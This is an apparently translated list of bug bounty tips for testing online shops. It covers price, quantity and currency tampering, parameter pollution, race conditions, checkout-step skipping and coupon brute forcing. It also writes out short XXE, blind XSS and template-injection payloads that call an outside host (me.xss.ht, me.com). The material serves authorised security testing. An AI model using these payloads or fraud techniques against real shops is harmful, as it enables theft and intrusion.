Hello, below I show some TIPS that can be used when practicing Bug Bounty.
All these entries belong to the author @0xAwali. We have only translated into Spanish, summarized in some parts and added in other references and explanations that are not in the original article.
#OnlineShoopBountie TIP #1 Try to manipulate the quantity. Example: If the original quantity is 1, try changing it to 3 to get two free items.
#OnlineShoopBountie TIP #2 Try to manipulate the price. Example: If the original price is 10, try changing it to -10 or the fraction value, 0.10 to get the cheapest item.
#OnlineShoopBountie TIP #3 Try to manipulate the currency. If the original currency is the dollar, try to change it to INR (or MXN) to get the cheapest item.
#OnlineShoopBountie TIP #4 Try using negative numbers, zero, NaN, null, or a bunch of 00000 in parameter values. Example: quantity=0000 OR Quantity=null to cause logic problems.
#OnlineShoopBountie TIP #5 Try using the HTTP Parameter Pollution technique. Example quantity=1&quantity=2 ,,, or quantity=[] with all the parameters to get free items.
#OnlineShoopBountie TIP #6 Remove parameters or change them to null to cause logic problems.
#OnlineShoopBountie TIP #7 Try to force the content-type from JSON to XML Content?Type: application/xml to perform XXE attacks <!DOCTYPE test [<!ENTITY xxe SYSTEM «http://me.com/xxe.dtd» >]>.
#OnlineShoopBountie <p>TIP #8 Inject XSS attacks «><svg> or blind XSS «><img src="//me.xss.ht"> in all the parameters of the purchase.</svg></p>
#OnlineShoopBountie TIP #9 Inject Blind XSS or Blind Template Injection attacks into the user-agent or into headers like X-Forwarded-For that take the user's IP. Example: {{constructor.constructor('import(«http://me.xss.ht«)')()}}
#OnlineShoopBountie TIP #10 Inyecte caracteres %00 Y %FF en todos los valores de los parámetros de la compra para causar errores intencionales que pueden exponer información confidencial.
#OnlineShoopBountie TIP #11 Insert a long character or number length into all parameter values. Example: quantity=1000000000000000000000000000000000000000000000000000 to cause errors that may expose sensitive information.
#OnlineShoopBountie TIP #12 If the application uses transfers from account A to account B, try running a race condition. Steps to reproduce: 1. Intercept the transfer HTTP request with a proxy tool like BurpSuite.2. Send the request to Turbo Intruder to execute the race condition. Note: You can also perform race conditions in BurpSuite's Intruder module using multiple threads.
Manual: https://krevetk0.medium.com/how-to-check-race-conditions-in-web-applications-338f73937992
#OnlineShoopBountie TIP #13 Check the different steps and flows of the process of purchasing a product. If your app runs the checkout process first, and then separately runs the purchase confirmation at the end, try skipping the steps in this flow, running only the HTTP request that performs the purchase confirmation, and you won't pay anything.
#OnlineShoopBountie TIP #14 If the application handles discount coupons, check if it is susceptible to brute force attacks as they can be discovered. If the coupon uses only numbers (no letters, no characters) and has a short length then you will surely find a valid coupon using a brute force attack via a python script or using BurpSuite's intruder module.
Manuals: https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types https://portswigger.net/burp/documentation/desktop/tutorials/brute-forcing-a-login-using-burp -intruder